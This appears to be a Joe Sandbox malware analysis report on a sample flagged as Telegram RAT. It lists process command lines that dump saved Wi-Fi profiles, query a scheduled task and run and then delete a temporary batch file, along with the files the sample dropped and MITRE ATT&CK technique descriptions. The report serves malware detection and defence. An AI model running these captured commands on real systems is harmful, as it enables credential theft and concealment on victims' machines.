Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x7ff772f40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HTZ4az17lj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\6D97C624D7.zip

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uuhbr0xg.h20.exe.log

C:\Users\user\AppData\Local\Temp\ndoyz5n0.3un

C:\Users\user\AppData\Local\Temp\p.html

C:\Users\user\AppData\Local\Temp\places.raw

C:\Users\user\AppData\Local\Temp\tmp3D76.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp59AE.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp59CE.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp753B.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp754C.tmp.dat

Windows Analysis Report
HTZ4az17lj.exe

Target ID:	17
Start time:	14:27:01
Start date:	16/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x7ff772f40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	14:27:03
Start date:	16/04/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks.exe" /query /TN WinTask
Imagebase:	0x7ff73e180000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	14:27:06
Start date:	16/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpB2A0.tmp.bat
Imagebase:	0x7ff772f40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Execution Coverage:	15.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre